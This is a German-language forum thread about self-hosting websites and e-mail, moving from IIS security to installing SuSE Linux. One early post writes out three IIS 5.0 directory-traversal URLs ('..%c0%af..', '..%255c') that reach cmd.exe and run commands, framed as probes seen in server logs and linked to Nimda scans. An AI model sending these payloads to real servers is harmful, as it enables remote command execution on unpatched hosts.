e-mail adressen

[Klon]

Hehe na ja es gibt Programme die gleich nach 60 Standart-Schwachstellen beim IIS suchen, haubtsächlich CGI Vulnerabilitys, ich denk mal ihr werdet auch viele Zugriffsversuche auf /_vti_bin/shtml.dll/_vti_rpc oder /iisadmpwd/aexp4.htr haben
Das mit der CMD.exe ist ziemlich übel, mit diesen drei Strings kann man beinem missconfigten IIS5.0 auf die CMD.exe mit IUSER-Rights zugreifen:

/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

Auch bekannt als "dot dot attack".
Da kann man sich dann bequem mit dem angehängten ?/c+dir das ausgeben lassen was inner Command bei "C:\dir [Enter]" ausgegeben würde, dem entsprechend lassen sich auch die andren Commands verwendet... böse böse.

Na ja das soll dann auch reichen an Infos wir wollen hier ja niemanden anstifften

 

[Christian Fein]

Hehe naja ich denke mal unser Webserver ist vor Scriptkiddys sicher.

Nur wenn mal einer kommt der ausser
1337 H@x0R Tools zu starten auch noch RICHTIG Ahnung
hat dann geb ich doch nicht die 100 % Garantie

 

[reto]

Hi,
das mit dem Zugriff auf CMD.exe interessiert mich auch. Was muss ich da im IIS einstellen? Ich meine, den Port 80 kann ich ja schlecht zumachen =)
Die restlichen Ports (ausser natürlich 25) sind mittels Firewall abgeriegelt.

Danke für jeden Tipp...

 

[Stephan Zesiger]

Opla!

In diesem Forum wird man nicht wirklich alleibgelassen.

@HolyFly, dPO2000: habe Euren Rat befolgt und mir SuSE 8.0 professional gekauft. Vor mir liegen 8 CD's, 4 Manuels und wahrscheinlich ein bisschen Lernen,lernen,lernen,lernen...

@Neorodeamon: Kein Problem, versteh Dich auch. Deine Kritik war wohl auch berechtigt. Muss an dieser Stelle aber noch erwähnen, dass ich Deine icq-Nr. nie rausgesucht habe und Dich auch nie kontaktiert habe. Dein Post kann nämlich von einem Dritten so verstanden werden. Zu Deiner Frage: Die Domains wurden von meinen Freunden/Bekannten reserviert. Ich habe dann die Seiten gemacht und sie beim Web-Space provider hochgeladen.

@Klon: Ja, erhalte nächste Woche eine Standleitung. POP/SMTP Server tönt ja nach massivem Aufwand. Ist das für einen non-professional (um es mal vorsichtig zu formulieren) überhaupt machbar? Möchte einfach, dass meine Kumpels e-mail Adressen entsprechend ihrer Domain erhalten. Eben z.Bsp. info@seineBar.ch

Vielen Dank/Grüsse
Skyla

 

[Christian Fein]

Opla!
@HolyFly, dPO2000: habe Euren Rat befolgt und mir SuSE 8.0 professional gekauft. Vor mir liegen 8 CD's, 4 Manuels und wahrscheinlich ein bisschen Lernen,lernen,lernen,lernen...

Jep gute Sache
(wieder einen kleinen Tux auf die Abschussliste aufmalen ). Hehe
ne Ohne witz für einen PHP Server ist das das beste was du machen kannst (mal von *BSD abgesehen).
Bei Fragen zum einrichten -> schwupps ins Linux Forum und Digi löchern.

@Klon: Ja, erhalte nächste Woche eine Standleitung. POP/SMTP Server tönt ja nach massivem Aufwand. Ist das für einen non-professional (um es mal vorsichtig zu formulieren) überhaupt machbar?
Skyla

Naja ich würde als non-Admin nicht versuchen kommerzielles Hosting anzubieten da mann bei so manncher Unachtsamkeit und falscher Konfiguration in Regress genommen werden koennte.

Um ein paar private Homesites von Freunden zu hosten ist das ganze nicht so schlimm.

 

[Neurodeamon]

Original geschrieben von Skyla
@Neorodeamon: Kein Problem, versteh Dich auch. Deine Kritik war wohl auch berechtigt. Muss an dieser Stelle aber noch erwähnen, dass ich Deine icq-Nr. nie rausgesucht habe und Dich auch nie kontaktiert habe. Dein Post kann nämlich von einem Dritten so verstanden werden. Zu Deiner Frage: Die Domains wurden von meinen Freunden/Bekannten reserviert. Ich habe dann die Seiten gemacht und sie beim Web-Space provider hochgeladen.

Ok, das scheint seltsam zu sein, denn die meisten Webhoster haben eine einfache Webadministration wo man als user nicht viel wissen muß, nur ein paar klicks, etwas eingeben und die email (pop oder forwarding) wird eingerichtet. Normalerweise braucht man dann keinen eigenen Server laufen zu lassen.

 

[Stephan Zesiger]

@Neurodeamon: Klar ist das einfach. Hab schliesslich auch 20 Euro im Monat und pro Seite für den Webspace bezahlt. Jetzt will ich's aber selber versuchen. Es geht dabei aber nicht ums Geld -es macht mir einfach Spass. Flash und Dreamweaver allein wird irgendwann langweilig. Ich habe aber verstanden, dass ein eigener Email-Server für mich eine (zu) anspruchsvolle Angelegnheit ist. Abgesehen davon bin ich jetzt mit der Installation von Linux genug beschäftigt. Wie gesagt: Step by Step.

Skyla

 

[Neurodeamon]

@skyla:

Ich habe aber verstanden, dass ein eigener Email-Server für mich eine (zu) anspruchsvolle Angelegnheit ist.

Noch ...
Es ist nur eine Frage der Zeit
Viel Spaß und Glück!

 

[dPo2000]

Original geschrieben von HolyFly


Weil ich habe mit der Firma einen Server und in den Logfiles kommt solch ein Versuch alle 2-3 Wochen vor.

sind das NIMDA scans ? würde ich nämlich dafür halten ;P



mfg
dPo

 

[Klon]

Der Nimda Worm greift auf cmd.exe zu über INet?!